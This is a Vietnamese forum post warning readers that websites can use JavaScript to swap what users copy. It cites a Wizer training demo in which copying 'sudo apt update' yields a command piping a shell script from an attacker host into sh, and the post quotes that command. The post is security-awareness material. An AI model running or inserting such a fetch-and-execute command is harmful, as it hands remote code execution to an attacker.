Chatbox
Các bạn vui lòng dùng từ ngữ lịch sự và có văn hóa,sử dụng Tiếng Việt có dấu chuẩn. Chúc các bạn vui vẻ!
07/01/2022 22:01 # 1
buiducduong
Cấp độ: 22 - Kỹ năng: 1

Kinh nghiệm: 7/220 (3%)
Kĩ năng: 0/10 (0%)
Ngày gia nhập: 25/09/2020
Bài gởi: 2317
Được cảm ơn: 0
Cẩn thận khi Copy Code từ các trang Web – Bạn có thể bị Hack

Các Lập trình viên, Sysadmins, nhà nghiên cứu bảo mật và những người yêu thích công nghệ  và tui thường hay Copy-Paste lệnh cấu hình, cài đặt thì các trang Web hướng dẫn cho nhanh, thay vì phải gõ lại từng câu lệnh. Tuy nhiên hành động này được cảnh báo dễ gây nguy hiểm và có thể khiến hệ thống bị Hack bởi khi Copy là 1 lệnh nhưng Paste ra là lệnh khác.

Một chuyên gia bảo mật đã thực hiện một thủ thuật đơn giản sẽ khiến bạn phải suy nghĩ kỹ trước khi copy và dán bất kỳ lệnh nào từ các trang web không tin cậy.

Cẩn thận khi Copy Code từ các trang Web khác - bạn có thể bị Hack

Lỗ hổng từ Clipboard – khay nhớ tạm

Gần đây, Gabriel Friedlander, người sáng lập nền tảng Wizer –  chuyên đào tạo nâng cao nhận thức về bảo mật đã thí nghiệm một vụ Hack đơn giản nhưng đáng ngạc nhiên sẽ khiến bạn phải thận trọng khi Copy các lệnh từ các trang web.

 

Việc Copy các lệnh thường dùng từ một trang web (ahem, StackOverflow) và dán chúng vào công cụ dòng lệnh (terminal) như CMD Windows hoặc Terminal Linux là điều rất quen thuộc đối với lập trình viên mới vào nghề hoặc những người lười như mình.

Nhưng Friedlander cảnh báo một trang web có thể được thay thế một cách bí mật nội dung của những gì có trên Clipboard của bạn và những gì thực sự được Copy vào khay nhớ tạm của bạn sẽ khác rất nhiều so với những gì bạn định sao chép.

Tệ hơn nữa, nếu không có bước kiểm tra cần thiết, lập trình viên có thể chỉ nhận ra lỗi của họ sau khi dán văn bản, lúc này có thể đã quá muộn.

Bạn có thể thực nghiệm kiểu Hack này tại trang https://www.wizer-training.com/blog/copy-paste.

 

Hãy thử copy dòng trên trang web, sau đó dán ra notepad hoặc bất cứ đâu.

hack copy paste

Bạn sẽ thấy kết quả không phải là sudo apt update mà là

curl http://attacker-domain:8000/shell.sh | sh

Nhiều người cứ nghĩ là họ đang copy một câu lệnh Update hệ thống của Linux, tưởng chừng như vô hại, nhưng thật ra trong bộ nhớ tạm đang lữu trữ lệnh tải shell.sh và thực thi sau khi tải xong.

Những người dán văn bản có thể có ấn tượng rằng họ đang sao chép cập nhật lệnh sudo apt quen thuộc, vô hại được sử dụng để tìm nạp thông tin cập nhật trên phần mềm được cài đặt trên hệ thống của bạn.

Thật ra khi view-source Website bạn sẽ thấy có một đoạn javascript có chức năng đổi nội dung khi bạn thực hiện lệnh Copy từ trang web đó.

 

Để khắc phục tình trạng này, bạn có thể dùng một số extension chặn javascript trên Chrome như: ScriptBlockDisable JavaScriptToggle JavaScript… nhưng nếu dùng như vậy, khi vào một số trang web dùng javascript sẽ bị lỗi hiển thị. Tốt nhất là khi copy nội dung gì, thì dán vào notepad trước khi xem nó ra đúng nội dung không, sau đó hãy dán vào Terminal
 
Copyright© Đại học Duy Tân 2010 - 2024